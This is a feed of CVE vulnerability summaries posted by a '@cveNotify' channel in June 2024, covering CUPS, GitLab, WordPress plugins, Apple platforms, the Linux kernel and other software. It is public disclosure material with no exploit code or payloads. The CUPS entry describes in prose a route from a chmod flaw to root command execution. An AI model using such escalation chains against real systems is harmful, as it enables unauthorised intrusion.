🚨 CVE-2024-35235OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.8 and earlier, when starting the cupsd server with a Listen configuration item pointing to a symbolic link, the cupsd process can be caused to perform an arbitrary chmod of the provided argument, providing world-writable access to the target. Given that cupsd is often running as root, this can result in the change of permission of any user or system files to be world writable. Given the aforementioned Ubuntu AppArmor context, on such systems this vulnerability is limited to those files modifiable by the cupsd process. In that specific case it was found to be possible to turn the configuration of the Listen argument into full control over the cupsd.conf and cups-files.conf configuration files. By later setting the User and Group arguments in cups-files.conf, and printing with a printer configured by PPD with a `FoomaticRIPCommandLine` argument, arbitrary user and group (not root) command execution could be achieved, which can further be used on Ubuntu systems to achieve full root command execution. Commit ff1f8a623e090dee8a8aadf12a6a4b25efac143d contains a patch for the issue.🎖@cveNotify |
|
| 2024-06-13 01:07:25 |
🚨 CVE-2024-4610Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r34p0 through r40p0; Valhall GPU Kernel Driver: from r34p0 through r40p0.🎖@cveNotify |
|
| 2024-06-12 23:37:25 |
🚨 CVE-2024-1736An issue has been discovered in GitLab CE/EE affecting all versions prior to 16.10.7, starting from 16.11 prior to 16.11.4, and starting from 17.0 prior to 17.0.2. A vulnerability in GitLab's CI/CD pipeline editor could allow for denial of service attacks through maliciously crafted configuration files.🎖@cveNotify |
|
| 2024-06-12 23:37:24 |
🚨 CVE-2024-1495An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.1 prior to 16.10.7, starting from 16.11 prior to 16.11.4, and starting from 17.0 prior to 17.0.2. It was possible for an attacker to cause a denial of service using maliciously crafted file.🎖@cveNotify |
|
| 2024-06-12 22:37:24 |
🚨 CVE-2024-35329libyaml 0.2.5 is vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c. NOTE: the supplier disputes this because the finding represents a user error. The problem is that the application, which was making use of the libyaml library, omitted the required calls to the yaml_document_initialize and yaml_document_delete functions.🎖@cveNotify |
|
| 2024-06-12 21:37:25 |
🚨 CVE-2024-37665An access control issue in Wvp GB28181 Pro 2.0 allows authenticated attackers to escalate privileges to Administrator via a crafted POST request.🎖@cveNotify |
|
| 2024-06-12 21:37:24 |
🚨 CVE-2023-48022Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment🎖@cveNotify |
|
| 2024-06-12 20:37:31 |
🚨 CVE-2024-5898A vulnerability was found in itsourcecode Payroll Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file print_payroll.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268142 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-12 20:37:30 |
🚨 CVE-2024-36264** UNSUPPORTED WHEN ASSIGNED ** Improper Authentication vulnerability in Apache Submarine Commons Utils.This issue affects Apache Submarine Commons Utils: from 0.8.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-06-12 20:37:29 |
🚨 CVE-2024-37301Document Merge Service is a document template merge service providing an API to manage templates and merge them with given data. Versions 6.5.1 and prior are vulnerable to remote code execution via server-side template injection which, when executed as root, can result in full takeover of the affected system. As of time of publication, no patched version exists, nor have any known workarounds been disclosed.🎖@cveNotify |
|
| 2024-06-12 20:37:26 |
🚨 CVE-2024-4792A vulnerability, which was classified as critical, has been found in Campcodes Online Laundry Management System 1.0. This issue affects some unknown processing of the file /admin_class.php. The manipulation of the argument id/delete_category/delete_inv/delete_laundry/delete_supply/delete_user/login/save_inv/save_user leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263891.🎖@cveNotify |
|
| 2024-06-12 20:37:25 |
🚨 CVE-2024-34365** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Karaf Cave.This issue affects all versions of Apache Karaf Cave.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-06-12 20:37:24 |
🚨 CVE-2023-51750ScaleFusion 10.5.2 does not properly limit users to the Edge application because file downloads can occur. NOTE: the vendor's position is "Not vulnerable if the default Windows device profile configuration is used which utilizes modern management with website allow-listing rules."🎖@cveNotify |
|
| 2024-06-12 19:37:31 |
🚨 CVE-2024-5798Vault and Vault Enterprise did not properly validate the JSON Web Token (JWT) role-bound audience claim when using the Vault JWT auth method. This may have resulted in Vault validating a JWT the audience and role-bound claims do not match, allowing an invalid login to succeed when it should have been rejected.This vulnerability, CVE-2024-5798, was fixed in Vault and Vault Enterprise 1.17.0, 1.16.3, and 1.15.9🎖@cveNotify |
|
| 2024-06-12 19:37:30 |
🚨 CVE-2023-29267IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5is vulnerable to a denial of service, under specific configurations, as the server may crash when using a specially crafted SQL statement by an authenticated user. IBM X-Force ID: 287612.🎖@cveNotify |
|
| 2024-06-12 19:37:26 |
🚨 CVE-2024-5894A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file manage_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268138 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-12 19:37:25 |
🚨 CVE-2024-4328A Cross-Site Request Forgery (CSRF) vulnerability exists in the clear_personality_files_list function of the parisneo/lollms-webui v9.6. The vulnerability arises from the use of a GET request to clear personality files list, which lacks proper CSRF protection. This flaw allows attackers to trick users into performing actions without their consent, such as deleting important files on the system. The issue is present in the application's handling of requests, making it susceptible to CSRF attacks that could lead to unauthorized actions being performed on behalf of the user.🎖@cveNotify |
|
| 2024-06-12 19:37:24 |
🚨 CVE-2024-35742Missing Authorization vulnerability in Code Parrots Easy Forms for Mailchimp.This issue affects Easy Forms for Mailchimp: from n/a through 6.9.0.🎖@cveNotify |
|
| 2024-06-12 18:07:42 |
🚨 CVE-2022-48683An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13. An app may be able to break out of its sandbox.🎖@cveNotify |
|
| 2024-06-12 18:07:41 |
🚨 CVE-2022-32933An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in macOS Monterey 12.5. A website may be able to track the websites a user visited in Safari private browsing mode.🎖@cveNotify |
|
| 2024-06-12 18:07:37 |
🚨 CVE-2024-35728Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Themeisle PPOM for WooCommerce allows Code Inclusion.This issue affects PPOM for WooCommerce: from n/a through 32.0.20.🎖@cveNotify |
|
| 2024-06-12 18:07:36 |
🚨 CVE-2024-37051GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 EAP2; DataGrip 2023.1.3, 2023.2.4, 2023.3.5, 2024.1.4; DataSpell 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.2, 2024.2 EAP1; GoLand 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; MPS 2023.2.1, 2023.3.1, 2024.1 EAP2; PhpStorm 2023.1.6, 2023.2.6, 2023.3.7, 2024.1.3, 2024.2 EAP3; PyCharm 2023.1.6, 2023.2.7, 2023.3.6, 2024.1.3, 2024.2 EAP2; Rider 2023.1.7, 2023.2.5, 2023.3.6, 2024.1.3; RubyMine 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP4; RustRover 2024.1.1; WebStorm 2023.1.6, 2023.2.7, 2023.3.7, 2024.1.4🎖@cveNotify |
|
| 2024-06-12 18:07:32 |
🚨 CVE-2024-35680Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in YITH YITH WooCommerce Product Add-Ons allows Code Injection.This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.9.2.🎖@cveNotify |
|
| 2024-06-12 18:07:31 |
🚨 CVE-2024-35658Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ThemeHigh Checkout Field Editor for WooCommerce (Pro) allows Functionality Misuse, File Manipulation.This issue affects Checkout Field Editor for WooCommerce (Pro): from n/a through 3.6.2.🎖@cveNotify |
|
| 2024-06-12 18:07:30 |
🚨 CVE-2024-35650Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Melapress MelaPress Login Security allows PHP Remote File Inclusion.This issue affects MelaPress Login Security: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-06-12 18:07:27 |
🚨 CVE-2024-3700Use of hard-coded password to the patients' database allows an attacker to retrieve sensitive data stored in the database. The password is the same among all Simple Care software installations.This issue affects Estomed Sp. z o.o. Simple Care software in all versions. The software is no longer supported.🎖@cveNotify |
|
| 2024-06-12 18:07:26 |
🚨 CVE-2024-28833Improper restriction of excessive authentication attempts with two factor authentication methods in Checkmk 2.3 before 2.3.0p6 facilitates brute-forcing of second factor mechanisms.🎖@cveNotify |
|
| 2024-06-12 18:07:25 |
🚨 CVE-2024-35741Missing Authorization vulnerability in Awesome Support Team Awesome Support.This issue affects Awesome Support: from n/a through 6.1.7.🎖@cveNotify |
|
| 2024-06-12 17:37:43 |
🚨 CVE-2024-5898A vulnerability was found in itsourcecode Payroll Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file print_payroll.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268142 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-12 17:07:25 |
🚨 CVE-2024-4744Missing Authorization vulnerability in Avirtum iPages Flipbook.This issue affects iPages Flipbook: from n/a through 1.5.1.🎖@cveNotify |
|
| 2024-06-12 17:07:24 |
🚨 CVE-2024-2408The openssl_private_decrypt function in PHP, when using PKCS1 padding (OPENSSL_PKCS1_PADDING, which is the default), is vulnerable to the Marvin Attack unless it is used with an OpenSSL version that includes the changes from this pull request: https://github.com/openssl/openssl/pull/13817 (rsa_pkcs1_implicit_rejection). These changes are part of OpenSSL 3.2 and have also been backported to stable versions of various Linux distributions, as well as to the PHP builds provided for Windows since the previous release. All distributors and builders should ensure that this version is used to prevent PHP from being vulnerable.PHP Windows builds for the versions 8.1.29, 8.2.20 and 8.3.8 and above include OpenSSL patches that fix the vulnerability.🎖@cveNotify |
|
| 2024-06-12 16:07:24 |
🚨 CVE-2024-36971In the Linux kernel, the following vulnerability has been resolved:net: fix __dst_negative_advice() race__dst_negative_advice() does not enforce proper RCU rules whensk->dst_cache must be cleared, leading to possible UAF.RCU rules are that we must first clear sk->sk_dst_cache,then call dst_release(old_dst).Note that sk_dst_reset(sk) is implementing this protocol correctly,while __dst_negative_advice() uses the wrong order.Given that ip6_negative_advice() has special logicagainst RTF_CACHE, this means each of the three ->negative_advice()existing methods must perform the sk_dst_reset() themselves.Note the check against NULL dst is centralized in__dst_negative_advice(), there is no need to duplicateit in various callbacks.Many thanks to Clement Lecigne for tracking this issue.This old bug became visible after the blamed commit, using UDP sockets.🎖@cveNotify |
|
| 2024-06-12 14:37:47 |
🚨 CVE-2024-5891A vulnerability was found in Quay. If an attacker can obtain the client ID for an application, they can use an OAuth token to authenticate despite not having access to the organization from which the application was created. This issue is limited to authentication and not authorization. However, in configurations where endpoints rely only on authentication, a user may authenticate to applications they otherwise have no access to.🎖@cveNotify |
|
| 2024-06-12 14:37:46 |
🚨 CVE-2024-36264** UNSUPPORTED WHEN ASSIGNED ** Improper Authentication vulnerability in Apache Submarine Commons Utils.This issue affects Apache Submarine Commons Utils: from 0.8.0.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-06-12 14:37:45 |
🚨 CVE-2024-36263** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Submarine Server Core.This issue affects Apache Submarine Server Core: all versions.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-06-12 14:37:44 |
🚨 CVE-2024-23445It was identified that if a cross-cluster API key https://www.elastic.co/guide/en/elasticsearch/reference/8.14/security-api-create-cross-cluster-api-key.html#security-api-create-cross-cluster-api-key-request-body restricts search for a given index using the query or the field_security parameter, and the same cross-cluster API key also grants replication for the same index, the search restrictions are not enforced during cross cluster search operations and search results may include documents and terms that should not be returned.This issue only affects the API key based security model for remote clusters https://www.elastic.co/guide/en/elasticsearch/reference/8.14/remote-clusters.html#remote-clusters-security-models that was previously a beta feature and is released as GA with 8.14.0🎖@cveNotify |
|
| 2024-06-12 14:37:41 |
🚨 CVE-2024-1659Arbitrary File Upload vulnerability in MegaBIP software allows attacker to upload any file to the server (including a PHP code file) without an authentication. This issue affects MegaBIP software versions through 5.10.🎖@cveNotify |
|
| 2024-06-12 14:37:40 |
🚨 CVE-2024-1576SQL Injection vulnerability in MegaBIP software allows attacker to obtain site administrator privileges, including access to the administration panel and the ability to change the administrator password. This issue affects MegaBIP software versions through 5.09.🎖@cveNotify |
|
| 2024-06-12 14:37:39 |
🚨 CVE-2024-30080Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-12 14:37:38 |
🚨 CVE-2024-32976Envoy is a cloud-native, open source edge and service proxy. Envoyproxy with a Brotli filter can get into an endless loop during decompression of Brotli data with extra input.🎖@cveNotify |
|
| 2024-06-12 13:38:20 |
🚨 CVE-2024-25949Dell OS10 Networking Switches, versions10.5.6.x, 10.5.5.x, 10.5.4.x and 10.5.3.x ,contain an improper authorization vulnerability. A remote authenticated attacker could potentially exploit this vulnerability leading to escalation of privileges.🎖@cveNotify |
|
| 2024-06-12 13:38:19 |
🚨 CVE-2024-37568lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (This is similar to CVE-2022-29217 and CVE-2024-33663.)🎖@cveNotify |
|
| 2024-06-12 13:38:15 |
🚨 CVE-2024-35748Missing Authorization vulnerability in OPMC WooCommerce Dropshipping.This issue affects WooCommerce Dropshipping: from n/a through 5.0.4.🎖@cveNotify |
|
| 2024-06-12 13:38:14 |
🚨 CVE-2024-35661Missing Authorization vulnerability in SoftLab Upload Fields for WPForms.This issue affects Upload Fields for WPForms: from n/a through 1.0.2.🎖@cveNotify |
|
| 2024-06-12 13:38:13 |
🚨 CVE-2024-34802Missing Authorization vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt.This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5.🎖@cveNotify |
|
| 2024-06-12 13:38:12 |
🚨 CVE-2024-32081Missing Authorization vulnerability in Websupporter Filter Custom Fields & Taxonomies Light.This issue affects Filter Custom Fields & Taxonomies Light: from n/a through 1.05.🎖@cveNotify |
|
| 2024-06-12 13:38:09 |
🚨 CVE-2024-31304Missing Authorization vulnerability in MultiVendorX WC Marketplace.This issue affects WC Marketplace: from n/a through 4.1.3.🎖@cveNotify |
|
| 2024-06-12 13:38:08 |
🚨 CVE-2024-31284Missing Authorization vulnerability in WPDeveloper EmbedPress.This issue affects EmbedPress: from n/a through 3.9.8.🎖@cveNotify |
|
| 2024-06-12 13:38:07 |
🚨 CVE-2024-31276Missing Authorization vulnerability in WPFactory Products, Order & Customers Export for WooCommerce.This issue affects Products, Order & Customers Export for WooCommerce: from n/a through 2.0.8.🎖@cveNotify |
|
| 2024-06-12 13:38:06 |
🚨 CVE-2024-31275Missing Authorization vulnerability in Metagauss EventPrime.This issue affects EventPrime: from n/a through 3.3.4.🎖@cveNotify |
|
| 2024-06-12 13:38:02 |
🚨 CVE-2024-32705Missing Authorization vulnerability in reputeinfosystems ARForms.This issue affects ARForms: from n/a through 6.4.🎖@cveNotify |
|
| 2024-06-12 13:38:01 |
🚨 CVE-2023-7216A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, which allows files to be written in arbitrary directories through symlinks.🎖@cveNotify |
|
| 2024-06-12 13:38:00 |
🚨 CVE-2023-29412CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS CommandInjection') vulnerability exists that could cause remote code execution when manipulatinginternal methods through Java RMI interface.🎖@cveNotify |
|
| 2024-06-12 12:37:56 |
🚨 CVE-2024-5211A path traversal vulnerability in mintplex-labs/anything-llm allowed a manager to bypass the `normalizePath()` function, intended to defend against path traversal attacks. This vulnerability enables the manager to read, delete, or overwrite the 'anythingllm.db' database file and other files stored in the 'storage' directory, such as internal communication keys and .env secrets. Exploitation of this vulnerability could lead to application compromise, denial of service (DoS) attacks, and unauthorized admin account takeover. The issue stems from improper validation of user-supplied input in the process of setting a custom logo for the app, which can be manipulated to achieve arbitrary file read, deletion, or overwrite, and to execute a DoS attack by deleting critical files required for the application's operation.🎖@cveNotify |
|
| 2024-06-12 12:37:55 |
🚨 CVE-2024-4927A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/admin/ajax.php?action=save_product. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264463.🎖@cveNotify |
|
| 2024-06-12 11:37:26 |
🚨 CVE-2024-5674The Newsletter - API v1 and v2 addon plugin for WordPress is vulnerable to unauthorized subscribers management due to PHP type juggling issue on the check_api_key function in all versions up to, and including, 2.4.5. This makes it possible for unauthenticated attackers to list, create or delete newsletter subscribers. This issue affects only sites running the PHP version below 8.0🎖@cveNotify |
|
| 2024-06-12 11:37:25 |
🚨 CVE-2024-3492The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'event', 'location', and 'event_category' shortcodes in all versions up to, and including, 6.4.7.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-12 11:37:24 |
🚨 CVE-2024-1766The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's Display Name in all versions up to, and including, 3.2.86 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.🎖@cveNotify |
|
| 2024-06-12 10:37:43 |
🚨 CVE-2024-36015In the Linux kernel, the following vulnerability has been resolved:ppdev: Add an error check in register_deviceIn register_device, the return value of ida_simple_get is unchecked,in witch ida_simple_get will use an invalid index value.To address this issue, index should be checked after ida_simple_get. Whenthe index value is abnormal, a warning message should be printed, the portshould be dropped, and the value should be recorded.🎖@cveNotify |
|
| 2024-06-12 10:37:42 |
🚨 CVE-2024-3657A flaw was found in 389-ds-base. A specially-crafted LDAP query can potentially cause a failure on the directory server, leading to a denial of service🎖@cveNotify |
|
| 2024-06-12 10:37:41 |
🚨 CVE-2024-2199A denial of service vulnerability was found in 389-ds-base ldap server. This issue may allow an authenticated user to cause a server crash while modifying `userPassword` using malformed input.🎖@cveNotify |
|
| 2024-06-12 10:37:38 |
🚨 CVE-2024-23271A logic issue was addressed with improved checks. This issue is fixed in iOS 17.3 and iPadOS 17.3, Safari 17.3, tvOS 17.3, macOS Sonoma 14.3, watchOS 10.3. A malicious website may cause unexpected cross-origin behavior.🎖@cveNotify |
|
| 2024-06-12 10:37:37 |
🚨 CVE-2023-6536A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-06-12 10:37:36 |
🚨 CVE-2023-6535A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-06-12 10:37:32 |
🚨 CVE-2023-6356A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-06-12 10:37:31 |
🚨 CVE-2024-23213The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-12 10:37:30 |
🚨 CVE-2024-23206An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-06-12 10:37:26 |
🚨 CVE-2023-42917A memory corruption vulnerability was addressed with improved locking. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2024-06-12 10:37:25 |
🚨 CVE-2023-5090A flaw was found in KVM. An improper check in svm_set_x2apic_msr_interception() may allow direct access to host x2apic msrs when the guest resets its apic, potentially leading to a denial of service condition.🎖@cveNotify |
|
| 2024-06-12 07:37:26 |
🚨 CVE-2024-5739The in-app browser of LINE iOS versions below 14.9.0 contains a Universal XSS (UXSS) vulnerability. This vulnerability allows for cross-site scripting (XSS) where arbitrary JavaScript can be executed in the top frame from an embedded iframe on any displayed web site within the in-app browser. The in-app browser is usually opened by tapping on URLs contained in chat messages, and for the attack to be successful, the victim must trigger a click event on a malicious iframe. If an iframe embedded in any website can be controlled by an attacker, this vulnerability could be exploited to capture or alter content displayed in the top frame, as well as user session information. This vulnerability affects LINE iOS versions below 14.9.0 and does not affect other LINE clients such as LINE Android. Please update LINE iOS to version 14.9.0 or higher.🎖@cveNotify |
|
| 2024-06-12 07:37:25 |
🚨 CVE-2024-0160Dell Client Platform contains an incorrect authorization vulnerability. An attacker with physical access to the system could potentially exploit this vulnerability by bypassing BIOS authorization to modify settings in the BIOS.🎖@cveNotify |
|
| 2024-06-12 07:37:24 |
🚨 CVE-2024-1735The in-app browser of LINE iOS versions below 14.9.0 contains a Universal XSS (UXSS) vulnerability. This vulnerability allows for cross-site scripting (XSS) where arbitrary JavaScript can be executed in the top frame from an embedded iframe on any displayed web site within the in-app browser. The in-app browser is usually opened by tapping on URLs contained in chat messages, and for the attack to be successful, the victim must trigger a click event on a malicious iframe. If an iframe embedded in any website can be controlled by an attacker, this vulnerability could be exploited to capture or alter content displayed in the top frame, as well as user session information. This vulnerability affects LINE iOS versions below 14.9.0 and does not affect other LINE clients such as LINE Android. Please update LINE iOS to version 14.9.0 or higher.🎖@cveNotify |
|
| 2024-06-12 06:37:26 |
🚨 CVE-2024-5892The Divi Torque Lite – Divi Theme and Extra Theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘support_unfiltered_files_upload’ function in all versions up to, and including, 3.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-12 06:37:25 |
🚨 CVE-2024-36454Use of uninitialized resource issue exists in IPCOM EX2 Series (V01L0x Series) V01L07NF0201 and earlier, and IPCOM VE2 Series V01L07NF0201 and earlier. If this vulnerability is exploited, the system may be rebooted or suspended by receiving a specially crafted packet.🎖@cveNotify |
|
| 2024-06-12 06:37:24 |
🚨 CVE-2024-0427The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.4.1 does not properly escape user-controlled input when it is reflected in some of its AJAX actions.🎖@cveNotify |
|
| 2024-06-12 05:37:24 |
🚨 CVE-2024-3559The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the the 'cfs[post_content]' parameter versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-12 04:37:42 |
🚨 CVE-2024-27850This issue was addressed with improvements to the noise injection algorithm. This issue is fixed in visionOS 1.2, macOS Sonoma 14.5, Safari 17.5, iOS 17.5 and iPadOS 17.5. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-06-12 04:37:41 |
🚨 CVE-2024-27840The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5. An attacker that has already achieved kernel code execution may be able to bypass kernel memory protections.🎖@cveNotify |
|
| 2024-06-12 04:37:40 |
🚨 CVE-2024-27838The issue was addressed by adding additional logic. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-06-12 04:37:37 |
🚨 CVE-2024-27836The issue was addressed with improved checks. This issue is fixed in visionOS 1.2, macOS Sonoma 14.5, iOS 17.5 and iPadOS 17.5. Processing a maliciously crafted image may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-12 04:37:36 |
🚨 CVE-2024-27832The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-12 04:37:35 |
🚨 CVE-2024-27830This issue was addressed through improved state management. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-06-12 04:37:31 |
🚨 CVE-2024-27817The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-06-12 04:37:30 |
🚨 CVE-2024-27812The issue was addressed with improvements to the file handling protocol. This issue is fixed in visionOS 1.2. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-06-12 04:37:26 |
🚨 CVE-2024-27808The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-12 04:37:25 |
🚨 CVE-2024-27801The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-12 04:37:24 |
🚨 CVE-2024-27800This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing a maliciously crafted message may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-06-12 03:37:32 |
🚨 CVE-2024-36856RMQTT Broker 0.4.0 allows remote attackers to cause a Denial of Service (daemon crash) via a certain sequence of five TCP packets.🎖@cveNotify |
|
| 2024-06-12 02:37:59 |
🚨 CVE-2024-5543The Slideshow Gallery LITE plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in all versions up to, and including, 1.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-12 02:37:56 |
